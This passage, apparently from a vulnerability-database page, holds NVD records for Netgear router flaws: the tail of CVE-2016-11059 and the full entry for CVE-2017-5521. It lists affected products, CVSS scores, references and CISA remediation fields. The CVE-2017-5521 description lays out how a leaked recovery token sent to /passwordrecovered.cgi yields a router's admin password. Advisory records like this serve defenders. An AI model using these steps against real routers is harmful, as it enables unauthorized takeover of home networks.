06-01-2017, R7500 hasta el 06-01-2017, R8000 hasta el 06-01-2017, WGR614v10 hasta el 06-01-2017, WNR1000v2 hasta el 06-01-2017, WNR1000v3 hasta el 06-01-2017, WNR1000v4 hasta el 06-01-2017, WNR2000v3 hasta el 06-01-2017, WNR2000v4 hasta el 06-01-2017, WNR2000v5 hasta el 06-01-2017, WNR2200 hasta el 06-01-2017, WNR2500 hasta el 06-01-2017, WNR3500Lv2 hasta el 06-01-2017, WNDR3400v2 hasta el 06-01-2017, WNDR3400v3 hasta el 06-01-2017, WNDR3700v3 hasta el 06-01-2017, WNDR3700v4 hasta el 06-01-2017, WNDR3700v5 hasta el 06-01-2017, WNDR4300 hasta el 06-01-2017, WNDR4300v2 hasta el 06-01-2017, WNDR4500v1 hasta el 06-01-2017, WNDR4500v2 hasta el 06-01-2017, and WNDR4500v3 hasta el 06-01-2017." } ], "id": "CVE-2016-11059", "lastModified": "2024-11-21T02:45:24.220", "metrics": { "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }, "published": "2020-04-28T17:15:12.460", "references": [ { "source": "cve@mitre.org", "tags": [ "Vendor Advisory" ], "url": "https://kb.netgear.com/27253/NETGEAR-Product-Vulnerability-Advisory-Authentication-Bypass-and-Information-Disclosure-on-Home-Routers" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "https://kb.netgear.com/27253/NETGEAR-Product-Vulnerability-Advisory-Authentication-Bypass-and-Information-Disclosure-on-Home-Routers" } ], "sourceIdentifier": "cve@mitre.org", "vulnStatus": "Modified", "weaknesses": [ { "description": [ { "lang": "en", "value": "CWE-200" } ], "source": "nvd@nist.gov", "type": "Primary" } ] }
Vulnerability from fkie_nvd
▼ | URL | Tags | |
---|---|---|---|
cve@mitre.org | http://kb.netgear.com/30632/Web-GUI-Password-Recovery-and-Exposure-Security-Vulnerability | Vendor Advisory | |
cve@mitre.org | http://www.securityfocus.com/bid/95457 | Broken Link, Third Party Advisory, VDB Entry | |
cve@mitre.org | https://www.exploit-db.com/exploits/41205/ | Exploit, Third Party Advisory, VDB Entry | |
af854a3a-2127-422b-91ae-364da2661108 | http://kb.netgear.com/30632/Web-GUI-Password-Recovery-and-Exposure-Security-Vulnerability | Vendor Advisory | |
af854a3a-2127-422b-91ae-364da2661108 | http://www.securityfocus.com/bid/95457 | Broken Link, Third Party Advisory, VDB Entry | |
af854a3a-2127-422b-91ae-364da2661108 | https://www.exploit-db.com/exploits/41205/ | Exploit, Third Party Advisory, VDB Entry |
Vendor | Product | Version | |
---|---|---|---|
netgear | r6200_firmware | 1.0.1.56_1.0.43 | |
netgear | r6200 | - | |
netgear | r6300_firmware | 1.0.2.78_1.0.58 | |
netgear | r6300 | - | |
netgear | vegn2610_firmware | 1.0.0.36 | |
netgear | vegn2610 | - | |
netgear | ac1450_firmware | 1.0.0.34_10.0.16 | |
netgear | ac1450 | - | |
netgear | wnr1000v3_firmware | 1.0.2.68_60.0.93 | |
netgear | wnr1000v3 | - | |
netgear | wndr3700v3_firmware | 1.0.0.40_1.0.32 | |
netgear | wndr3700v3 | - | |
netgear | wndr4000_firmware | 1.0.2.4_9.1.86 | |
netgear | wndr4000 | - | |
netgear | wndr4500_firmware | 1.0.1.44_1.0.73 | |
netgear | wndr4500 | - | |
netgear | d6400_firmware | 1.0.0.44 | |
netgear | d6400 | - | |
netgear | d6220_firmware | 1.0.0.12 | |
netgear | d6220 | - | |
netgear | d6300_firmware | 1.0.0.96 | |
netgear | d6300 | - | |
netgear | d6300b_firmware | 1.0.0.40 | |
netgear | d6300b | - | |
netgear | dgn2200bv4_firmware | 1.0.0.68 | |
netgear | dgn2200bv4 | - |
{ "cisaActionDue": "2022-09-29", "cisaExploitAdd": "2022-09-08", "cisaRequiredAction": "Apply updates per vendor instructions. If the affected device has since entered end-of-life, it should be disconnected if still in use.", "cisaVulnerabilityName": "NETGEAR Multiple Devices Exposure of Sensitive Information Vulnerability", "configurations": [ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netgear:r6200_firmware:1.0.1.56_1.0.43:*:*:*:*:*:*:*", "matchCriteriaId": "1C1769F8-B2CB-465B-85B8-9D7AC25C63CB", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netgear:r6200:-:*:*:*:*:*:*:*", "matchCriteriaId": "8A466B29-3ADA-46D9-824C-8DF9160B7DD7", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netgear:r6300_firmware:1.0.2.78_1.0.58:*:*:*:*:*:*:*", "matchCriteriaId": "89A99D1C-CABE-4526-B3B7-3708C0E18AC4", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netgear:r6300:-:*:*:*:*:*:*:*", "matchCriteriaId": "9597966A-B13C-4098-838B-EC9AA8DE443D", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netgear:vegn2610_firmware:1.0.0.36:*:*:*:*:*:*:*", "matchCriteriaId": "6D329D85-C180-426E-B430-9FEDE5C77F25", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netgear:vegn2610:-:*:*:*:*:*:*:*", "matchCriteriaId": "0967FC76-F977-4D18-B570-9444459A19FE", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netgear:ac1450_firmware:1.0.0.34_10.0.16:*:*:*:*:*:*:*", "matchCriteriaId": "91292776-92F7-4089-86FC-7569C8F940DE", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netgear:ac1450:-:*:*:*:*:*:*:*", "matchCriteriaId": "E4BA18B2-8234-4C26-B865-741D467C5EBE", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netgear:wnr1000v3_firmware:1.0.2.68_60.0.93:*:*:*:*:*:*:*", "matchCriteriaId": "4E35A89F-44C7-496C-B61B-652989EDE438", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netgear:wnr1000v3:-:*:*:*:*:*:*:*", "matchCriteriaId": "252E5C7B-EF02-4374-A43E-02FAA9E697D0", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netgear:wndr3700v3_firmware:1.0.0.40_1.0.32:*:*:*:*:*:*:*", "matchCriteriaId": "1D59A6F9-0359-4AB4-AD0F-1D6044D59409", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netgear:wndr3700v3:-:*:*:*:*:*:*:*", "matchCriteriaId": "603836E6-E7FF-43C7-A410-8BD9D0950F7C", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netgear:wndr4000_firmware:1.0.2.4_9.1.86:*:*:*:*:*:*:*", "matchCriteriaId": "91561A20-30F5-4163-9178-5FC32897F827", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netgear:wndr4000:-:*:*:*:*:*:*:*", "matchCriteriaId": "1C34EC74-D6F1-46F1-B47E-E62793171427", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netgear:wndr4500_firmware:1.0.1.44_1.0.73:*:*:*:*:*:*:*", "matchCriteriaId": "B9874914-4D90-493F-BD2B-40FFF1737F58", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netgear:wndr4500:-:*:*:*:*:*:*:*", "matchCriteriaId": "7E9F459C-B628-402A-AF4A-72E08FE41837", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netgear:d6400_firmware:1.0.0.44:*:*:*:*:*:*:*", "matchCriteriaId": "D3EB5F49-3628-4418-AF36-AF8FD6F5BA25", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netgear:d6400:-:*:*:*:*:*:*:*", "matchCriteriaId": "7D30939B-86E3-4C78-9B05-686B4994C8B9", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netgear:d6220_firmware:1.0.0.12:*:*:*:*:*:*:*", "matchCriteriaId": "ECD46588-5866-4159-85E1-58B0D1F98406", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netgear:d6220:-:*:*:*:*:*:*:*", "matchCriteriaId": "F3EEA190-2E9C-4586-BF81-B115532FBA23", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netgear:d6300_firmware:1.0.0.96:*:*:*:*:*:*:*", "matchCriteriaId": "7B15B85C-F099-4584-9F59-1CFC3275D625", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netgear:d6300:-:*:*:*:*:*:*:*", "matchCriteriaId": "78542C95-85CC-43E5-9F0E-B12DDD5B79C4", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netgear:d6300b_firmware:1.0.0.40:*:*:*:*:*:*:*", "matchCriteriaId": "D0CE8A8F-7894-4140-8E4B-84153C5A6B13", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netgear:d6300b:-:*:*:*:*:*:*:*", "matchCriteriaId": "37B89703-CAFB-43F6-8880-90349F8ED856", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netgear:dgn2200bv4_firmware:1.0.0.68:*:*:*:*:*:*:*", "matchCriteriaId": "E1CDFE4F-6C5C-4B10-926E-92C7759D60EF", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netgear:dgn2200bv4:-:*:*:*:*:*:*:*", "matchCriteriaId": "9C78A475-9DDF-432B-A94A-01EFAC7DC70D", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" } ], "cveTags": [], "descriptions": [ { "lang": "en", "value": "An issue was discovered on NETGEAR R8500, R8300, R7000, R6400, R7300, R7100LG, R6300v2, WNDR3400v3, WNR3500Lv2, R6250, R6700, R6900, and R8000 devices. They are prone to password disclosure via simple crafted requests to the web management server. The bug is exploitable remotely if the remote management option is set, and can also be exploited given access to the router over LAN or WLAN. When trying to access the web panel, a user is asked to authenticate; if the authentication is canceled and password recovery is not enabled, the user is redirected to a page that exposes a password recovery token. If a user supplies the correct token to the page /passwordrecovered.cgi?id=TOKEN (and password recovery is not enabled), they will receive the admin password for the router. If password recovery is set the exploit will fail, as it will ask the user for the recovery questions that were previously set when enabling that feature. This is persistent (even after disabling the recovery option, the exploit will fail) because the router will ask for the security questions." }, { "lang": "es", "value": "Se ha descubierto un problema en dispositivos NETGEAR R8500, R8300, R7000, R6400, R7300, R7100LG, R6300v2, WNDR3400v3, WNR3500Lv2, R6250, R6700, R6900 y R8000. Son propensos a revelar la contrase\u00f1a a trav\u00e9s de peticiones simples manipuladas al servidor de gesti\u00f3n de la web. El error es explotable remotamente si la opci\u00f3n de gesti\u00f3n remota est\u00e1 activada, y tambi\u00e9n puede ser explotado dado el acceso al router a trav\u00e9s de LAN o WLAN. Cuando se trata de acceder al panel web, se pide al usuario que se autentique; si la autenticaci\u00f3n se cancela y la recuperaci\u00f3n de contrase\u00f1a no est\u00e1 habilitada, el usuario es redirigido a una p\u00e1gina que revela un token de recuperaci\u00f3n de contrase\u00f1a. Si un usuario proporciona el token correcto a la p\u00e1gina /passwordrecovered.cgi?id=TOKEN (y la recuperaci\u00f3n de contrase\u00f1a no est\u00e1 habilitada), recibir\u00e1n la contrase\u00f1a de administrador para el router. Si la recuperaci\u00f3n de contrase\u00f1a est\u00e1 habilitada, la explotaci\u00f3n fallar\u00e1, ya que pedir\u00e1 al usuario preguntas para la recuperaci\u00f3n que fueron previamente establecidas cuando se habilit\u00f3 esa caracter\u00edstica. Esto es persistente (incluso tras la inhabilitaci\u00f3n de la opci\u00f3n de recuperaci\u00f3n, la explotaci\u00f3n fallar\u00e1) porque el router preguntar\u00e1 por las preguntas de seguridad." } ], "id": "CVE-2017-5521", "lastModified": "2024-11-21T03:27:48.497", "metrics": { "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.2, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ] }, "published": "2017-01-17T09:59:00.333", "references": [ { "source": "cve@mitre.org", "tags": [ "Vendor Advisory" ], "url": "http://kb.netgear.com/30632/Web-GUI-Password-Recovery-and-Exposure-Security-Vulnerability" }, { "source": "cve@mitre.org", "tags": [ "Broken Link", "Third Party Advisory", "VDB Entry" ], "url": "http://www.securityfocus.com/bid/95457" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "https://www.exploit-db.com/exploits/41205/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "http://kb.netgear.com/30632/Web-GUI-Password-Recovery-and-Exposure-Security-Vulnerability" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Broken Link", "Third Party Advisory", "VDB Entry" ], "url": "http://www.securityfocus.com/bid/95457" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "https://www.exploit-db.com/exploits/41205/" } ], "sourceIdentifier": "cve@mitre.org", "vulnStatus": "Modified", "weaknesses": [ { "description": [ { "lang": "en", "value": "NVD-CWE-noinfo" } ], "source": "nvd@nist.gov", "type": "Primary" } ] }